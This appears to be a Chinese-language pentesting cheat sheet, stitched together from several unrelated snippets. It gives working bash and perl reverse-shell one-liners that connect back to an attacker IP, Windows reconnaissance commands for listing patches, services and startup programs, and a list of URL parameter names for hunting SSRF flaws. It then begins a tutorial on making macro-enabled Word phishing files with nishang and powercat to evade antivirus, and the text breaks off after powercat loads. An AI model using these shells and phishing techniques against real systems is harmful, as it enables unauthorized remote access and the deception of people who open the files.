反弹的各种姿势。

bash版本：

1

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

注意这个是由解析shell的bash完成，所以某些情况下不支持

perl版本:

1

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

使用wmic识别安装到系统中的补丁情况

1

C:\> wmic qfe get description,installedOn

识别正在运行的服务

1
2

C:\>sc query type= service
C:\>net start

识别开机启动的程序，包括路径

1

C:\>wmic startup list full

从以下URL关键字中寻找SSRF漏洞：

1
2
3
4
5
6
7
8
9
10
11
12
13
14

share
wap
url
link
src
source
target
u
3g
display
sourceURl
imageURL
domain
...

0x00 简介

Powershell是windows下面非常强大的命令行工具，并且在windows中Powershell可以利用.NET Framework的强大功能，也可以调用windows API，在win7/server 2008以后，powershell已被集成在系统当中。 除此之外，使用powershell能很好的bypass各种AV，在渗透测试中可谓是一个神器。此次使用的是开源的powershell脚本集nishang中的client来制作钓鱼文件。其中office类型文件可以达到钓鱼目的的前提是office已经启用宏。

0x01制作word钓鱼文件

下载powercat （powershell的nc）
加载powercat ：

1
2
3

PS G:\github\Pentest\powershell\powercat-master> . .\powercat.ps1
PS G:\github\Pentest\powershell\powercat-master> powercat
You must select either client mode (-c) or listen mode (-l).